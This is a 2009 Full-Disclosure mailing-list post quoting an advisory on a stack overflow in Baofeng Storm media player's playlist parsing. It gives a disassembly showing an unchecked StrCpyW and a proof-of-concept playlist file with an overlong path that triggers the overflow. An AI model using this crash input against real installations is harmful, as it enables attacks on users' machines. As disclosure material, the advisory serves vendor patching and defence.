[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Baofeng Media Player playlist stack overflow vulnerability
- To: Full-Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Baofeng Media Player playlist stack overflow vulnerability
- From: "Jambalaya ." <jambalaya.maillist@xxxxxxxxx>
- Date: Mon, 29 Jun 2009 19:48:05 +0800
Vendor Response:
2009.06.24 Vendor notified via phone
2009.06.26 Vendor release new version
[Vendor notify me that the date of report and response in my advisory is
wrong]
2009/6/29 Jambalaya . <jambalaya.maillist@xxxxxxxxx>
> Baofeng Media Player playlist stack overflow vulnerability
>
> By Jambalaya of Nevis Labs
> Date: 2009.06.24
>
>
> Vender:
> Baofeng
>
> Affected:
> Storm 3.9.62
> *Other version may also be affected
>
> Overview:
> Baofeng is a widely popular media player in China, and it plays many common
> media file formats. There are almost 120 million customer using baofeng
> media player in China.
>
> Details:
> The specific flaws exists in medialib.dll. the stack overflow
> vulnerablility is due to the way it incorrectly handle smpl file type which
> is a playlist.Succssfully exploiting this vulnerability allows attackers to
> execute arbitrary code on vulnerable installation.
>
> the vulnerability could be triggered when it pass a long path, and lack
> legal examine on the length of path:
>
> .text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
> .text:1000567B sub_1000567B proc near ; DATA XREF:
> .rdata:100248D4 o
> .text:1000567B
> .text:1000567B FileName = word ptr -628h
> .text:1000567B var_10 = dword ptr -10h
> .text:1000567B var_C = dword ptr -0Ch
> .text:1000567B var_4 = dword ptr -4
> .text:1000567B pszUrl = dword ptr 8
> .text:1000567B pcchPath = dword ptr 0Ch
> .text:1000567B
> .text:1000567B mov eax, offset sub_100221F8
> .text:10005680 call __EH_prolog
> .text:10005685 sub esp, 61Ch
> .text:1000568B push ebx
> .text:1000568C push esi
> .text:1000568D mov esi, [ebp+pszUrl]
> .text:10005690 mov [ebp+var_10], ecx
> .text:10005693 test esi, esi
> .text:10005695 jz loc_1000577D
> .text:1000569B mov ebx, [ebp+pcchPath]
> .text:1000569E test ebx, ebx
> .text:100056A0 jz loc_1000577D
> .text:100056A6 push edi
> .text:100056A7 push esi ; pszPath
> .text:100056A8 xor edi, edi
> .text:100056AA mov [ebp+pcchPath], 208h
> .text:100056B1 call ds:PathIsURLW
> .text:100056B7 test eax, eax
> .text:100056B9 jz short loc_100056E0
> .text:100056BB push 3 ; UrlIs
> .text:100056BD push esi ; pszUrl
> .text:100056BE call ds:UrlIsW
> .text:100056C4 test eax, eax
> .text:100056C6 jz short loc_100056E0
> .text:100056E0 loc_100056E0: ; CODE XREF:
> sub_1000567B+3E j
> .text:100056E0 ; sub_1000567B+4B j
> .text:100056E0 lea eax, [ebp+FileName]
> .text:100056E6 push esi
> .text:100056E7 push eax
> .text:100056E8 call ds:StrCpyW
> <---------------------strcpy directly with out any examiation.
>
> Proof of concept:
> <playlist><item name="2.GIF" source="C:\Documents and
> Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif"
> source="C:\Documents and
> Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
> duration="0"/></playlist>
>
>
> Greetz to those friends who I have long time no see T_T:Pratik Dixit,
> Sanjay pendse, Winny Thomas, ajit.hatti
>
> Vendor Response:
> 2009.06.16 Vendor notified via email
> 2009.06.25 Vendor release new version
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/